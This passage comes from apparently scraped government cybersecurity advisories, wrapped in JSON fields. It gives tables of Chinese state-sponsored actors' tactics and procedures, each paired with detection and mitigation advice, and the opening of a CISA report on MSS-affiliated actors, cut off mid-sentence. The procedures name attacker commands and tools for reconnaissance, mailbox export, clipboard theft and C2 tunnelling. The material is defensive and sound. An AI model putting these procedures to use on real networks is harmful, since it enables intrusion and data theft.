[[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a >)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a >)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a >)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com >)][[11](<https://exploit-db.com >)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services 